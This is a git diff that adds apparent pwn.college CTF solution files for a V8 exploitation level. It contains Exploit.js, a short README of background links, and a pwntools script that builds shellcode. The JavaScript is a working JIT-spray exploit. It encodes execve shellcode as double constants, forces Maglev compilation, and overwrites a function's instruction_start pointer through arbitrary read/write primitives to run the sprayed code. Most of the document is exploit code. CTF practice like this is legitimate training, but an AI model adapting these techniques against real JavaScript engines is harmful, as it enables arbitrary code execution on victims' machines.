diff --git a/JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js new file mode 100644 index 0000000..79a44df --- /dev/null +++ b/JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js @@ -0,0 +1,45 @@ +// Integrated Builtin: +// - int32 GetAddressOf(obj); +// - int32 ArbRead32(int32 cage_addr); +// - void ArbWrite32(int32 cage_addr, int32 value); + +// To execute shellcode, we need JIT spray instead of writing RWX segment. +// Because we cannot write in the 64-bit address space. + +// RWXAddr: Function -> code(+0xC) -> instruction_start(+0x14) +// JIT Spray Double Constant Offset: RWXAddr + 0x6B + +function shellcode() { + // JIT spray machine code form of `execve("catflag", NULL, NULL)` + return [ + 1.9995716422075807e-246, + 1.9710255944286777e-246, + 1.97118242283721e-246, + 1.971136949489835e-246, + 1.9711826272869888e-246, + 1.9711829003383248e-246, + -9.254983612527998e+61 + ]; +} +for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation + +function unptr(v) { + return v & 0xfffffffe; +} + +function ptr(v) { + return v | 1; +} + +let shellcode_addr = GetAddressOf(shellcode); +console.log("Address of shellcode: " + shellcode_addr.toString(16)); +let code_addr = unptr(ArbRead32(shellcode_addr + 0xC)); +console.log("Address of code: " + code_addr.toString(16)); +let instruction_start_addr = code_addr + 0x14; +let instruction_start = ArbRead32(instruction_start_addr); +console.log("instruction_start: " + instruction_start.toString(16)); +ArbWrite32(instruction_start_addr, instruction_start + 0x6B); +shellcode(); + +// %DebugPrint(shellcode); +// %SystemBreak(); \ No newline at end of file diff --git a/JavaScript/PwnCollegeV8Exploitation/Level2/README.md b/JavaScript/PwnCollegeV8Exploitation/Level2/README.md new file mode 100644 index 0000000..1907fee --- /dev/null +++ b/JavaScript/PwnCollegeV8Exploitation/Level2/README.md @@ -0,0 +1,20 @@ +# Level 2 + +## Problem + +Given the following primitves: +- AddressOf +- Arbitrary Read & Write in Sandbox + +## Key Knowledge + +- [Pointer Compression in V8](https://v8.dev/blog/pointer-compression) +- V8 Optimization Tiers + - [Intepreter Ignition](https://v8.dev/blog/sparkplug) + - [Non-optimizing JavaScript compiler Sparkplug](https://v8.dev/blog/sparkplug) + - [Mid-tier optimizing compiler Maglev](https://v8.dev/blog/maglev) + - Top-tier optimizing compiler [Turbofan](https://v8.dev/docs/turbofan) / [Turboshaft](https://v8.dev/blog/holiday-season-2023) +- [V8 Native Syntaxs](https://v8.dev/docs/builtin-functions) + - [V8引擎漏洞分析环境与调试方法基础](https://gtoad.github.io/2019/07/25/V8-Debug/) +- [JIT Spray in V8](https://www.matteomalvica.com/blog/2024/06/05/intro-v8-exploitation-maglev/#jit-spraying-shellcode) +- [Shellcraft of Pwntools](https://docs.pwntools.com/en/stable/shellcraft/amd64.html) diff --git a/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py b/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py new file mode 100644 index 0000000..5cefcf1 --- /dev/null +++ b/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py @@ -0,0 +1,46 @@ +from pwn import context, shellcraft +from common import * +context(arch = 'amd64', os = 'linux') + +# execve("catflag", NULL, NULL) + +assembly = f""" +/* Craft envp to rdx */ +xor rdx, rdx /* 3 */ +/* Craft argv to rsi */ +xor rsi, rsi /* 3 */ +jmp (. + 0x2) + 0xc /* 2 */ +/* Craft pathname to rdi */ +mov eax, 0x0067616c /* 5 */ +nop +jmp (. + 0x2) + 0xc /* 2 */ + +shl rax, 32 /* 4 */ +nop +nop +jmp (. + 0x2) + 0xc /* 2 */ + +mov ebx, 0x66746163 /* 5 */ +nop +jmp (. + 0x2) + 0xc /* 2 */ + +or rax, rbx /* 3 */ +push rax /* 1 */ +nop +nop +jmp (. + 0x2) + 0xc /* 2 */ + +mov rdi, rsp /* 3 */ +nop +nop +nop +jmp (. + 0x2) + 0xc /* 2 */ + +/* syscall execve */ +{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")} /* 5 */ +int3 /* 1 */ +int3 /* 1 */ +int3 /* 1 */ +""".strip() + +dump_machine_code(assembly)